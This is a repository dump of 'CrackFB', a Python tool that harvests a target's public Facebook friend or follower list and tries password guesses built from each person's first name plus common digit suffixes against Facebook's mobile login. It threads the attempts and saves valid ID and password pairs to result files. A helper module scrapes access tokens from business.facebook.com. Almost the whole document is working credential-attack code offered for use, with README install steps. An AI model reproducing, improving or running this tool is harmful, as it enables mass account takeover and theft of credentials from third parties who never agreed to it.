├── README.md ├── crack.py ├── lib └── gen_token.py └── requirements.txt /README.md: -------------------------------------------------------------------------------- 1 | # CrackFB V1.0 2 | ### Crack Public Friends and Followers List With This Tool... 3 | 4 | ## Installation Commands: 5 | ``` shell script 6 | apt update -y 7 | apt upgrade -y 8 | pkg install python git -y 9 | git clone https://github.com/Toxic-Noob/CrackFB 10 | cd CrackFB 11 | pip install -r requirements.txt 12 | python crack.py 13 | ``` 14 | 15 | # Contact: 16 | 17 | [*] For Any Need, Contact Me Via Mail: 18 | 19 | toxicnoob.sl4d3.official@gmail.com 20 | 21 | # Visitors : 22 | 23 | 24 | ![Visitor Count](https://profile-counter.glitch.me/Toxic-Noob/count.svg) 25 | -------------------------------------------------------------------------------- /crack.py: -------------------------------------------------------------------------------- 1 | ######################################### 2 | # Coded By HunterSl4d3 3 | # A Product Of ToxicNoob 4 | # https://github.com/Toxic-Noob/ 5 | # You Have No Permission To Copy Any Code 6 | ######################################### 7 | 8 | import time, os, sys, json 9 | import itertools, threading 10 | import requests 11 | import calendar, random 12 | import mechanize 13 | import bs4 14 | import concurrent.futures as cf 15 | from datetime import datetime 16 | from datetime import date 17 | from bs4 import BeautifulSoup as parser 18 | from lib.gen_token import * 19 | 20 | 21 | user_agents = ["Mozilla/5.0 (Linux; arm; Android 8.1.0; LM-Q610.FGN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 YaApp_Android/11.30 YaSearchBrowser/11.30 BroPP/1.0 SA/1 Mobile Safari/537.36", "Mozilla/5.0 (Linux; Android 7.1.1; OPPO R11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"] 22 | 23 | 24 | def psb(z): 25 | for k in z + "\n": 26 | sys.stdout.write(k) 27 | sys.stdout.flush() 28 | time.sleep(0.03) 29 | 30 | def psbn(z): 31 | for k in z + "\n": 32 | sys.stdout.write(k) 33 | sys.stdout.flush() 34 | time.sleep(0.007) 35 | 36 | def logopsb(z): 37 | for e in z + '\n': 38 | sys.stdout.write(e) 39 | sys.stdout.flush() 40 | time.sleep(0.001) 41 | 42 | rows, column = os.popen('stty size', 'r').read().split() 43 | 44 | def logo(): 45 | os.system("clear") 46 | logopsb("\033[92m ____ _ _____ ____ \n / ___|_ __ __ _ ___| | _| ___| __ ) \n| | | '__/ _` |/ __| |/ / |_ | _ \ \n| |___| | | (_| | (__| <| _| | |_) |\n \____|_| \__,_|\___|_|\_\_| |____/ \n ") 47 | logopsb("\033[3;90m A Product Of ToxicNoob\033[0;92m") 48 | time.sleep(0.6) 49 | logopsb("\n"+"\033[94m*"*int(column)+"\n\033[95;3m Author \033[0;95m:\033[3;95m ToxicNoob\n\033[3m Tool \033[0;95m:\033[3;95m FB Public ID Cracker\n\033[3m Version \033[0;95m:\033[3;95m 2.4\n\033[3m GitHub \033[0;95m:\033[3;95m https://www.github.com/Toxic-Noob/\n\033[3m Coded By \033[0;95m:\033[3;95m HunterSl4d3\n"+"\033[0;94m*"*int(column)) 50 | time.sleep(0.8) 51 | 52 | 53 | ###GetToken### 54 | def token_data(): 55 | if os.path.exists(".token"): 56 | data = open(".token", "r").read() 57 | else: 58 | login_menu() 59 | data = open(".token", "r").read() 60 | return data 61 | 62 | ###UserLogin### 63 | def login(): 64 | token = token_data() 65 | url = "https://graph.facebook.com/me?access_token="+token 66 | req = requests.get(url).text 67 | try: 68 | js = json.loads(req) 69 | login.name = js["name"] 70 | login.id = js["id"] 71 | login.bd = js["birthday"] 72 | except: 73 | logo() 74 | psb("\n\033[91m [!] Token Expired or ID is In Checkpoint...\033[37m") 75 | k = input("\n\033[92m [*] Press Enter To Go To Login Menu....") 76 | login_menu() 77 | login() 78 | 79 | 80 | ###UserData### 81 | def user_data(): 82 | name = login.name 83 | id = login.id 84 | bd = login.bd 85 | print("\033[93m*" * int(column), end ="") 86 | print("\n\033[92m [*] User Name :\033[37;40m "+name) 87 | print("\033[92m [*] BirthDay :\033[37;40m "+bd) 88 | print("\033[92m [*] User ID :\033[37;40m "+id+"\033[92m") 89 | print("\033[93m*" * int(column), end ="") 90 | 91 | ###StartedAlert### 92 | def started(name): 93 | logo() 94 | user_data() 95 | print("\n\033[92m [*] Target Public ID : \033[37m"+name+"\n") 96 | print("\033[94m*" * int(column), end="") 97 | psb("\n\033[92m [*] Cracking Process Started...") 98 | psb(" [*] Process May Take Some Time...") 99 | psb(" [*] Please Be Patient...") 100 | print("\033[94m*" * int(column), end="") 101 | print("\n") 102 | 103 | ###FriendsList### 104 | def friend(): 105 | token = token_data() 106 | uid = input("\n\033[92m [*] Enter Public Friendlist ID:> \033[37m") 107 | usr = "https://graph.facebook.com/"+uid+"?access_token="+token 108 | usrdt = requests.get(usr).text 109 | js = json.loads(usrdt) 110 | try: 111 | name = js["name"] 112 | except: 113 | psb("\n\033[91m [!] User Dose Not Exists!!\033[37m") 114 | sys.exit() 115 | print("\n\033[92m [*] User Name : \033[37m"+name) 116 | url = "https://graph.facebook.com/"+uid+"/friends?access_token="+token 117 | re = requests.get(url).text 118 | try: 119 | re = json.loads(re)["data"] 120 | except: 121 | if ("permission denied" in json.loads(re)["error"]["message"].lower()): 122 | psb("\n\033[91m [!] FriendList Cloning Is Not Available Right Now...") 123 | psb(" [!] Cause : \033[37mFacebook API Error!!\n") 124 | return 125 | psb("\n\033[91m [!] Given User's FriendList Isn't Public!!\033[37m") 126 | sys.exit() 127 | started(name) 128 | with cf.ThreadPoolExecutor() as tp: 129 | tp.map(crack, re) 130 | print("Finished") 131 | 132 | 133 | ###FollowersList### 134 | def follower(): 135 | token = token_data() 136 | uid = input("\n\033[92m [*] Enter Public Followers ID:> \033[37m") 137 | usr = "https://graph.facebook.com/"+uid+"?access_token="+token 138 | usrdt = requests.get(usr).text 139 | js = json.loads(usrdt) 140 | try: 141 | name = js["name"] 142 | except: 143 | psb("\n\033[91m [!] User Dose Not Exists!!\033[37m") 144 | sys.exit() 145 | print("\n\033[92m [*] User Name : \033[37m"+name) 146 | print("\033[92m [*] Followers : \033[37m5000\n\033[92m") 147 | url = "https://graph.facebook.com/"+uid+"/subscribers?limit=20000&access_token="+token 148 | re = requests.get(url).text 149 | try: 150 | re = json.loads(re)["data"] 151 | except: 152 | psb("\n\033[91m [!] Given User's FollowerList Isn't Public!!\033[37m") 153 | sys.exit() 154 | started(name) 155 | with cf.ThreadPoolExecutor() as tp: 156 | tp.map(crack, re) 157 | print("\033[92m\n\t\t[*] Finished [*]\033[37m") 158 | 159 | ###LogOut### 160 | def logout(): 161 | psb("\n\033[92m [*] Please Wait, Logging Out...") 162 | try: 163 | os.system("rm .token") 164 | except: 165 | pass 166 | psb("\n [*] Logged Out Successfully...") 167 | k = input("\n [*] Press Enter To Go Back...") 168 | login_menu() 169 | 170 | ###CrackMenu### 171 | def crack_menu(): 172 | login() 173 | logo() 174 | user_data() 175 | psb("\n\033[92m [*] Choose Your Option:") 176 | print("\n [01] Public FriendList Cloning") 177 | print(" [02] Public Followers Cloning") 178 | print(" [03] Logout (Remove Token)") 179 | print(" [04] Exit") 180 | op = input("\n\033[92m [*] Enter Your Option:> ").replace("0", "") 181 | while not (op in ["1", "2", "3", "4"]): 182 | psb("\n\033[91m [!] Choose a Correct Option!") 183 | op = input("\033[92m\n [*] Enter Your Choice:> "). replace("0", "") 184 | if (op == "1"): 185 | friend() 186 | elif (op == "2"): 187 | follower() 188 | elif (op == "3"): 189 | logout() 190 | elif (op == "4"): 191 | exit("\n\033[92m [*] Thanks For Using Our Tool!!\033[37m\n") 192 | 193 | 194 | ###MainMenu### 195 | def login_menu(): 196 | logo() 197 | psb("\n\033[92m [*] Choose Your Login Method: ") 198 | print("\n [01] Login With Token ") 199 | print(" [02] Login With User Pass") 200 | print(" [03] Login With Cookie") 201 | print(" [04] Exit") 202 | op = input("\n [*] Enter Your Choice:> "). replace("0", "") 203 | while not (op in ["1", "2", "3", "4"]): 204 | psb("\n\033[91m [!] Choose a Correct Option!") 205 | op = input("\n [*] Enter Your Choice:> "). replace("0", "") 206 | if (op == "1"): 207 | token_login() 208 | elif (op == "2"): 209 | email_login() 210 | elif (op == "3"): 211 | cookie_login() 212 | elif (op == "4"): 213 | exit("\n\033[92m [*] Thanks For Using Our Tool!!\033[37m\n") 214 | 215 | 216 | ###MainProcess### 217 | def crack(list_data, **kwargs): 218 | uid = list_data["id"] 219 | name = list_data["name"].rsplit(' ')[0].lower() 220 | if (len(name) < 3) or (name == "md") or (name == "angel"): 221 | name = list_data["name"].rsplit(' ')[1] 222 | host = "https://mbasic.facebook.com" 223 | pass1 = name+"12" 224 | pass2 = "12233445" 225 | if not (len(name) < 6): 226 | pass1 = name 227 | pass2 = name+"12" 228 | pass3 = name+"123" 229 | pass4 = name+"1234" 230 | pass5 = "123456" 231 | pwx = [pass1, pass2, pass3, pass4, pass5] 232 | ua = random.choice(user_agents) 233 | 234 | try: 235 | for pw in pwx: 236 | if len(uid) < 14: 237 | continue 238 | kwargs = {} 239 | pw = pw.lower() 240 | ses = requests.Session() 241 | ses.headers.update({'origin': host, 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 'accept-encoding': 'gzip, deflate', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'user-agent': ua, 'Host': ('').join(bs4.re.findall('://(.*?)$', host)), 'referer': host + '/login/?next&ref=dbl&fl&refid=8', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'content-type': 'application/x-www-form-urlencoded'}) 242 | p = ses.get(host + '/login/?next&ref=dbl&refid=8').text 243 | b = parser(p, 'html.parser') 244 | bl = ['lsd', 'jazoest', 'm_ts', 'li', 'try_number', 'unrecognized_tries', 'login'] 245 | for i in b('input'): 246 | try: 247 | if i.get('name') in bl: 248 | kwargs.update({i.get('name'): i.get('value')}) 249 | else: 250 | continue 251 | except: 252 | pass 253 | 254 | kwargs.update({'email': uid, 'pass': pw, 'prefill_contact_point': '', 'prefill_source': '', 'prefill_type': '', 'first_prefill_source': '', 'first_prefill_type': '', 'had_cp_prefilled': 'false', 'had_password_prefilled': 'false', 'is_smart_lock': 'false', '_fb_noscript': 'true'}) 255 | re = ses.post(host + '/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8', data=kwargs) 256 | if 'c_user' in ses.cookies.get_dict().keys(): 257 | ui = uid.replace("\n", "") 258 | print("\033[92m[ Toxic-OK ] : "+ui+" | "+pw+"\033[37m") 259 | file_data = open("results/ok.txt", "r").read() 260 | file_ok = open("results/ok.txt", "w") 261 | file_ok.write(file_data+"\n"+ui+" | "+pw) 262 | file_ok.close() 263 | break 264 | elif 'checkpoint' in ses.cookies.get_dict().keys(): 265 | ui = uid.replace("\n", "") 266 | print("\033[91m[ Toxic-CP ] : "+ui+" | "+pw+"\033[37m") 267 | file_data = open("results/cp.txt", "r").read() 268 | file_cp = open("results/cp.txt", "w") 269 | file_cp.write(file_data+"\n"+ui+" | "+pw) 270 | file_cp.close() 271 | break 272 | elif "error" in re.text.lower(): 273 | print("\n [!] Error Occured!!") 274 | print("\n [!] Try Again Later...") 275 | sys.exit() 276 | elif "Nomor telepon yang Anda masukkan tidak cocok dengan akun mana saja" in re.text or "Nombor telefon yang anda masukkan tidak sepadan dengan mana-mana akaun" in re.text: 277 | break 278 | elif "someting went wrong" in re.text.lower(): 279 | file = open(".temp", "w") 280 | file.write(re.text) 281 | file.close() 282 | except Exception as e: 283 | print(e) 284 | 285 | 286 | if __name__ == "__main__": 287 | if not os.path.exists("results"): 288 | os.mkdir("results") 289 | if not os.path.exists(".token"): 290 | login_menu() 291 | crack_menu() 292 | -------------------------------------------------------------------------------- /lib/gen_token.py: -------------------------------------------------------------------------------- 1 | #################################### 2 | # Author : ToxicNoob 3 | # GitHub : https://github.com/Toxic-Noob/ 4 | # Coder : HunterSl4d3 5 | # You Have No Permission To Copy Any Codes 6 | # Coping Others Code Will Not Make You a Coder 7 | #################################### 8 | 9 | import time, sys, os, re 10 | import requests 11 | ses = requests.Session() 12 | urls="https://business.facebook.com/business_locations" 13 | 14 | def psb(z): 15 | for p in z + "\n": 16 | sys.stdout.write(p) 17 | sys.stdout.flush() 18 | time.sleep(0.03) 19 | 20 | def save_token(token): 21 | file = open(".token", "w") 22 | file.write(token) 23 | file.close() 24 | 25 | ###UserAgent### 26 | def user_agent(): 27 | if os.path.exists(".agent"): 28 | data = open(".agent", "r").read() 29 | else: 30 | psb("\033[92m\n [*] Go To Your Browser, Copy your UserAgent and Past Here For Safe Login...") 31 | os.system("xdg-open https://google.com/search?q=my+user+agent") 32 | time.sleep(1) 33 | data = input("\n [*] Enter Your User Agent:> \033[37m") 34 | file = open(".agent", "w") 35 | file.write(data) 36 | file.close() 37 | return data 38 | 39 | 40 | ###Email_Login### 41 | def email_login(): 42 | agent = user_agent() 43 | user = input("\033[92m\n [*] Enter Your Number/Email:> \033[37m") 44 | pw = input("\033[92m\n [*] Enter Your Password:> \033[37m") 45 | while (len(pw) < 6): 46 | psb("\n\033[91m [*] Please Check Your Password and Enter Again...") 47 | pw = input("\033[92m\n [*] Enter Your Password:> \033[37m") 48 | time.sleep(0.6) 49 | try: 50 | head = { 51 | 'Host' : 'm.facebook.com', 52 | 'cache-control' : 'max-age=0', 53 | 'upgrade-insecure-requests' : '1', 54 | 'user-agent' : agent, 55 | 'accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 56 | 'sec-fetch-mode' : 'navigate', 57 | 'sec-fetch-user' : '?1', 58 | 'sec-fetch-dest' : 'document', 59 | 'accept-encoding' : 'gzip, deflate', 60 | 'accept-language' : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7' 61 | } 62 | try: 63 | r = ses.get("https://m.facebook.com/", headers = head).text.encode('utf-8') 64 | except: 65 | r = ses.get("https://m.facebook.com/", headers = head).text 66 | head2 = { 67 | 'Host' : 'm.facebook.com', 68 | 'user-agent' : agent, 69 | 'content-type' : 'application/x-www-form-urlencoded', 70 | 'x-fb-lsd' : re.search('name="lsd" value="(.*?)"', str(r)).group(1), 71 | 'accept' : '*/*', 72 | 'origin' : 'https://m.facebook.com', 73 | 'sec-fetch-site' : 'same-origin', 74 | 'sec-fetch-mode' : 'cors', 75 | 'sec-fetch-dest' : 'empty', 76 | 'referer' : 'https://m.facebook.com/', 77 | 'accept-encoding' : 'gzip, deflate', 78 | 'accept-language' : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7' 79 | } 80 | payload = { 81 | "fb_dtsg" : re.search('{"token":"(.*?)"', str(r)).group(1), 82 | "lsd" : re.search('name="lsd" value="(.*?)"', str(r)).group(1), 83 | "jazoest" : re.search('name="jazoest" value="(.*?)"', str(r)).group(1), 84 | "m_ts" : re.search('name="m_ts" value="(.*?)"', str(r)).group(1), 85 | "li" : re.search('name="li" value="(.*?)"', str(r)).group(1), 86 | "try_number" : "0", 87 | "unrecognized_tries" : "0", 88 | "prefill_contact_point" : user, 89 | "prefill_source" : "browser_dropdown", 90 | "prefill_type" : "contact_point", 91 | "first_prefill_source" : "browser_dropdown", 92 | "first_prefill_type" : "contact_point", 93 | "had_cp_prefilled" : True, 94 | "had_password_prefilled" : False, 95 | "is_smart_lock" : False, 96 | "bi_xrwh" : "0", 97 | "__dyn" : "", 98 | "__csr" : "", 99 | "__req" : "2", 100 | "__a" : "", 101 | "__user" : "0", 102 | "email" : user, 103 | "encpass" : "#PWD_BROWSER:0:"+real_time()+":"+pw 104 | } 105 | ses.post("https://m.facebook.com/login/device-based/login/async/?refsrc=deprecated&lwv=100", headers = head2, data = payload) 106 | cookie = ses.cookies.get_dict() 107 | if 'c_user' in (cookie): 108 | head = { 109 | 'Host' : 'business.facebook.com', 110 | 'cache-control' : 'max-age=0', 111 | 'upgrade-insecure-requests' : '1', 112 | 'user-agent' : 'Mozilla/5.0 (Linux; Android 6.0.1; Redmi 4A Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.92 Mobile Safari/537.36', 113 | 'accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 114 | 'content-type' : 'text/html; charset=utf-8', 115 | 'accept-encoding' : 'gzip, deflate', 116 | 'accept-language' : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7' 117 | } 118 | r = ses.get(urls, headers = head) 119 | p = re.search('(EAAG\w+)', r.text) 120 | token = p.group(1) 121 | save_token() 122 | elif "checkpoint" in (cookie): 123 | psb("\n\033[91m [*] Your ID is In Checkpoint!!\033[37m") 124 | else: 125 | psb("\n\033[91m [*] Your Email or Password is Wrong!!\033[37m") 126 | except AttributeError: 127 | psb("\n\033[91m [*] Your Email or Password is Wrong!!\033[37m") 128 | 129 | 130 | ###Cookie_Login### 131 | def cookie_login(): 132 | cookies = input("\n\033[92m [*] Enter Your Cookie:> \033[37m") 133 | time.sleep(0.6) 134 | try: 135 | head = { 136 | 'Host' : 'business.facebook.com', 137 | 'cache-control' : 'max-age=0', 138 | 'upgrade-insecure-requests' : '1', 139 | 'user-agent' : 'Mozilla/5.0 (Linux; Android 6.0.1; Redmi 4A Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.92 Mobile Safari/537.36', 140 | 'accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 141 | 'content-type' : 'text/html; charset=utf-8', 142 | 'accept-encoding' : 'gzip, deflate', 143 | 'accept-language' : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 144 | 'cookie' : cookies 145 | } 146 | r = ses.get(urls, headers = head) 147 | p = re.search('(EAAG\w+)', r.text) 148 | token = p.group(1) 149 | save_token(token) 150 | except (AttributeError, requests.exceptions.TooManyRedirects): 151 | psb("\n\033[91m [*] Cookie Expired!!\033[37m") 152 | 153 | 154 | ###TokenLogin### 155 | def token_login(): 156 | token = input("\n\033[92m [*] Past Your Token:> \033[37m") 157 | save_token(token) -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | mechanize 3 | bs4 4 | --------------------------------------------------------------------------------